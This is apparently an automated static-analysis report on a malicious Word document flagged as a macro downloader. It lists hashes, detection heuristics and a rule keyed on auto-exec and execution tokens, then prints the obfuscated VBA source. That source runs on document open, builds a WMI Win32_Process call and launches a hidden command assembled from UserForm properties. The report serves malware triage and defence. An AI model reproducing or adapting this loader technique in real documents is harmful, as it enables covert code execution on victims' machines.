Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2fe2806aaa7485cb…

MALICIOUS

Office (OLE)

Size: 184.6 KB
Created: 2019-12-13 20:15:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: b5feadfbc9851764ac4ce92dea6801d1
SHA-1: ae6491179cad18363e94e268f976407d8c2b9389
SHA-256: 2fe2806aaa7485cba0719ec3781b64f73ad38c18da0f1b5ae3536a6378d9817c
Risk score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Sagent-7454029-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-7454029-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Cqfhnrokw = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wvmalqaed.Xafmjubswzkvh + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Hcopysxragjqb = CreateObject(Null & Cqfhnrokw)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10966 bytes
SHA-256: 8b140e455a34f8aa92109811060058b938672f863f8a9ca7d458fa6e659b1eb2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
230 of 354 identifiers look randomly generated (e.g. 'winOMDNmgmOMDNts') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Wvmalqaed"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Xafmjubswzkvh, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Lhzuefqeoualy = Jjtcjzakdxoxc
Datpclovfiq = Qgcluecuhva
Xwxqhnvbqa = Eounnutomt
Select _
 Case Ddxgtvesrsns
      Case 972
         Adqmzglbqqh _
         = Hex _
         (814)
         Bhjxdzdmepoi = CVar(207)
         Yrmacqytpxau _
         = Hex(699)
      Case 872
         Bnhymbdliu = CVar(368)
         Ucwnbefkmkdq _
         = 488
         Vhrlxjiulri = CDate _
         (108)
      Case 538
         Ssnjrqjvwxcw = _
         CInt(932)
         Gwrjqtvgvtw = Log(Kaqefmim)
         Alavvzkppcucx = Rvzmwunvp
End Select
   Ngpafhkxkn = Vfbdtvztvff
Xprjuzujjgvrg = Buantyxyqiux
Nibtdhstnpnre = Fmnzgraescxzq
Select _
 Case Ackkwyuy
      Case 640
         Aigkzcumzkv _
         = Hex _
         (769)
         Dhndiqfhbrmpl = CVar(46)
         Palokkgjuuta _
         = Hex(627)
      Case 729
         Rrftegcjumh = CVar(633)
         Yquuouzwy _
         = 751
         Wnxysjpqc = CDate _
         (161)
      Case 460
         Agwgasgfyg = _
         CInt(46)
         Itzzffer = Log(Xwrjeqlxqumo)
         Yhugpsaajjp = Jjkydrjjzpro
End Select
   Fhlatmzc = Hruzpaapt
Exmdazpkort = Xufldbzw
Tpbiqnswrjm = Ywtnjsloop
Select _
 Case Vuomsxto
      Case 274
         Oyrzwwubsrwk _
         = Hex _
         (529)
         Koqeezezlfu = CVar(765)
         Kzlslafh _
         = Hex(216)
      Case 197
         Kvotmxzglnybe = CVar(927)
         Kjopnledskc _
         = 403
         Kkbiprfiqgscl = CDate _
         (830)
      Case 298
         Gfivecbqqs = _
         CInt(292)
         Fsvjkrzwal = Log(Mbhudwmbmv)
         Bgcwitlpiha = Wikldiupwjcv
End Select
Mybqpirouq
End Sub


Attribute VB_Name = "Kopbukxsd"
Attribute VB_Base = "0{B641B2EB-DC93-416B-BEA6-8182BA37ABEF}{EC934842-EAC4-4E0F-ABBD-E9134B1B0760}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Yjnrqrtuutmgd"
Function Jxohkkahqtvg()
   Tlikltzxt = Gourbdmzhh
Kxuipgvqwxhvm = Qmpdrdxkkbtvi
Yzolynrkjr = Pigyfrevm
Select _
 Case Nwnmjhvk
      Case 806
         Mzhhallzcf _
         = Hex _
         (98)
         Vhbdcoedixgw = CVar(352)
         Kahcoglwdjy _
         = Hex(160)
      Case 21
         Ftvjlqtbf = CVar(845)
         Eggkdoslf _
         = 826
         Lsarghye = CDate _
         (469)
      Case 173
         Ljzkmnvfh = _
         CInt(871)
         Pbxhzbtor = Log(Uehdjujmca)
         Txhzqaxf = Wvqcjggfqarzo
End Select
Zxwqjvefztk = Wvmalqaed.Xafmjubswzkvh
   Hszgkzgq = Xvyozibhmikb
Ezpedqvnrrdhg = Rqiytsrxul
Nuepfqbbkkcmw = Dhkrbdwvrc
Select _
 Case Encvsxris
      Case 868
         Xqfvzgov _
         = Hex _
         (594)
         Ioqjufuqzmmc = CVar(837)
         Oipjpfrrpfmaw _
         = Hex(557)
      Case 339
         Ocgbnwzllxrwr = CVar(569)
         Ovhhgqre _
         = 922
         Crykwujmtkkgb = CDate _
         (89)
      Case 527
         Pwdlxizx = _
         CInt(903)
         Rsobfxxaeke = Log(Odikxjqi)
         Grtotiocuk = Culnnmfxk
End Select
Qaaydpknm = Zxwqjvefztk + Kopbukxsd.Oudrjneamo + Kopbukxsd.Liivbpuc + Kopbukxsd.Ubrfolzplf
   Btripuhispsn = Qiwiwteeaa
Vpkfzgeosehyo = Sklfuwkxhcp
Pxsrxpyrynp = Gumbxuofmt
Select _
 Case Pclsdckaoyvl
      Case 998
         Ykwtxvtl _
         = Hex _
         (906)
         Lffurkdddwi = CVar(187)
         Zvkeluhzblw _
         = Hex(442)
      Case 57
         Jswtbdmv = CVar(840)
         Xqjevrhtslwwy _
         = 822
         Hrjrjujzmak = CDate _
         (773)
      Case 591
         Ueassynobp = _
         CInt(936)
         Tsdjhmukc = Log(Ddxcnqwekl)
         Oleeaycfbwjqc = Fnqvhasxovv
End Select
Gjrfhzfxhpqqe = Qaaydpknm + Kopbukxsd.Kyvmmurntvuio + Kopbukxsd.Xhgccpwdsucg.ControlTipText
   Lwgoefvozog = Camxihzx
Osghhlzyw = Hucbhtlslzqg
Fvqmghrzr = Xyndaqjqivgk
Select _
 Case Ooeagymq
      Case 219
         Pjlpqdhd _
         = Hex _
         (192)
         Jvxpljgqh = CVar(945)
         Ltlstmykujgxl _
         = Hex(376)
      Case 555
         Euaenczprsq = CVar(781)
         Xswjpcdpzxw _
         = 835
         Sqwcxmbuel = CDate _
         (254)
      Case 598
         Xwmduzcx = _
         CInt(662)
         Cnxiikbfxdo = Log(Jtoudnusgg)
         Frlfxuszfoj = Ertzomntmck
End Select
Jxohkkahqtvg = Iqrdaanhqg + Gjrfhzfxhpqqe + Iqrdaanhqg
   Koruestpzgpfv = Verappgbu
Zypxoqquhn = Dfeiuwcvntadx
Gjenwatsvzcsy = Irghovkg
Select _
 Case Ryxfxlznu
      Case 45
         Dasxjmiise _
         = Hex _
         (835)
         Mljxqnavc = CVar(239)
         Fcvnyoced _
         = Hex(237)
      Case 814
         Ernjeibxtan = CVar(855)
         Toniauojls _
         = 233
         Nzkupzbbxgsj = CDate _
         (531)
      Case 870
         Suezhskkt = _
         CInt(686)
         Teiqftya = Log(Jqddbmponwdb)
         Uelkukcf = Wvskrmtisqid
End Select
End Function
Function Mybqpirouq()
   Zndlbecyhucv = Yhtnulauckfld
Tjmjolzclpgop = Aqhwjinidg
Ltgqayyok = Hozfhxowlu
Select _
 Case Pegurgbjcu
      Case 458
         Ifzfqqmylez _
         = Hex _
         (195)
         Cfkojikskq = CVar(60)
         Dhhjfjnhmxcx _
         = Hex(165)
      Case 879
         Uivylfylo = CVar(888)
         Utlwvyoomni _
         = 240
         Fulbxfcmfen = CDate _
         (457)
      Case 971
         Lfgustgtlqclq = _
         CInt(446)
         Jwsmdgtqtxn = Log(Dooxuymiirvpx)
         Ejphgodjlbyp = Mxelipwbeqs
End Select
Cqfhnrokw = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wvmalqaed.Xafmjubswzkvh + "rocess"
   Vvilaxrvwihdz = Jrpfqvlgoycp
Jdmcbdef = Gjuyvkrp
Vepyndkotmy = Tmeuaymoelmzg
Select _
 Case Kehmphgeoop
      Case 451
         Plsfyoblqqrq _
         = Hex _
         (110)
         Rtczhcxdpflso = CVar(285)
         Qgkauyssg _
         = Hex(315)
      Case 203
         Zbunqvbhpklo = CVar(945)
         Ulvntgzpczkg _
         = 673
         Byawypdvjcpp = CDate _
         (770)
      Case 15
         Wxfrdfznw = _
         CInt(388)
         Urjzudjgig = Log(Oqsrybtxep)
         Futdktnbvjex = Oyfjiafnqbkob
End Select
Set Hcopysxragjqb = CreateObject(Null & Cqfhnrokw)
   Ztxarwknypa = Cvwaabvgn
Jepmvdoybp = Xygjjtnw
Kagiscpdimao = Hxsvbbvspty
Select _
 Case Rmmzwnnupgnl
      Case 273
         Yhaajgtclb _
         = Hex _
         (522)
         Tzrkmjpjxrvm = CVar(158)
         Dtrqejqs _
         = Hex(813)
      Case 74
         Ptpvzpalhb = CVar(804)
         Cfudvblhlnw _
         = 674
         Akvwifbc = CDate _
         (515)
      Case 883
         Ttujiqkfdgpq = _
         CInt(159)
         Boogqzcxhszef = Log(Wslvkbjarcqbh)
         Mjyyvuqu = Svmckelvg
End Select
Poaahdhup = Cqfhnrokw + Kopbukxsd.Vryoitvobufd.ControlTipText + Kopbukxsd.Trpgjcjfab.ControlTipText
   Ehmojsdkttfzr = Ocnepgqcpbfl
Smtiqsuwn = Ixtlpoxct
Qvvsnfxndgzga = Rahzrohzgj
Select _
 Case Amijkstwymy
      Case 431
         Zacyirtfdxw _
         = Hex _
         (949)
         Ukjwojqowaux = CVar(144)
         Hjnecdksnea _
         = Hex(671)
      Case 91
         Dlxoloqyjnbx = CVar(313)
         Acaibtdlvqt _
         = 429
         Jbwevrsmczli = CDate _
         (825)
      Case 243
         Oxwlgopkpnwye = _
         CInt(417)
         Qgvrwgxnjggw = Log(Dozstpoyengbz)
         Hwmevmsqr = Rknfzrpmmzxg
End Select
Kvqhkoey = Poaahdhup + Wvmalqaed.Xafmjubswzkvh
   Yhtrqeronn = Uwktdnnvk
Niylcgznhg = Nybcixbhcs
Unfatbhbrwfi = Oinzbaokxvbl
Select _
 Case Jajvzgqpazugz
      Case 406
         Rsskpittcqje _
         = Hex _
         (398)
         Kyhwisrmkjk = CVar(123)
         Hoevajpfcibpp _
         = Hex(404)
      Case 299
         Gfqcgzpan = CVar(491)
         Mdeijznjmex _
         = 450
         Vukipggtc = CDate _
         (756)
      Case 89
         Ftivzrnrl = _
         CInt(631)
         Matzbcgdbjjhh = Log(Hkhdxksydqr)
         Urgkyyijoq = Nyjwvlai
End Select
Set Mybqpirouq = CreateObject(Kvqhkoey)
   Nuinegpcb = Pcmzfwqgxwab
Zswduycg = Cohksejfqyhi
Vbnovhntyl = Szhrsiksxqo
Select _
 Case Snukmuqxkhs
      Case 720
         Lkgiqweelky _
         = Hex _
         (24)
         Yycoengac = CVar(493)
         Ilqopirogdxa _
         = Hex(160)
      Case 390
         Asbjgcwmgvs = CVar(867)
         Cfenjpoaefqod _
         = 97
         Scbyqzeufq = CDate _
         (654)
      Case 42
         Vwfvwulojbpo = _
         CInt(439)
         Ovmkudjnteute = Log(Kzxnxsdzkttre)
         Mnntliiuvsi = Aacqpqzc
End Select
Mybqpirouq.XSize = False * False
   Oeqchdvsnmdxy = Kjyrjvvzxk
Fgicfyjbhy = Bzqqkwjqzfr
Dodtetsqtqm = Yyolblmlpk
Select _
 Case Paaakzobl
      Case 248
         Gidfewijdk _
         = Hex _
         (941)
         Lbodgtfneynos = CVar(71)
         Iqxdywnicyf _
         = Hex(18)
      Case 152
         Haaupboywwi = CVar(695)
         Oghuommfa _
         = 252
         Gbbxtmfal = CDate _
         (744)
      Case 896
         Dytyrcslt = _
         CInt(438)
         Sihbhjtvjgiu = Log(Zqejrixqhdj)
         Vjnoyrljtqs = Hpfzudgkrlnbc
End Select
Mybqpirouq.YSize = False * False
   Ofvqarnmorr = Yjpiyxop
Opsyiwozayo = Tgmwyuealp
Vaqvojazshahs = Zrqnozxvclb
Select _
 Case Knczvamvydmo
      Case 404
         Tmgeeteeivciz _
         = Hex _
         (838)
         Ojntepeea = CVar(538)
         Suandyzadjwh _
         = Hex(423)
      Case 334
         Qfegxmboqktzv = CVar(892)
         Phfsmajeus _
         = 111
         Yuvrcqwnkz = CDate _
         (805)
      Case 124
         Zqeeptec = _
         CInt(751)
         Ocrokwhbkot = Log(Tvsrjzvz)
         Btwvfoanbu = Saogzgipj
End Select
Do While Hcopysxragjqb.Create(Null & Jxohkkahqtvg, Eitzrheac, Mybqpirouq)
Loop
   Urykpmrlxbvw = Fmvmizztaz
Sbyqgbugeca = Dnkogympwyt
Tkvaqygatpmhu = Jecmivfl
Select _
 Case Tbszwcfbh
      Case 130
         Kelbgqjyxg _
         = Hex _
         (633)
         Kgswhgco = CVar(726)
         Uxxoaxmhg _
         = Hex(261)
      Case 359
         Syzqkcfvnr = CVar(387)
         Witegxvft _
         = 527
         Joerpmmqa = CDate _
         (863)
      Case 300
         Rhsfwdwslovp = _
         CInt(856)
         Htfjkhsht = Log(Gkqjbbyh)
         Llbbriazpoz = Isggpszknd
End Select
End Function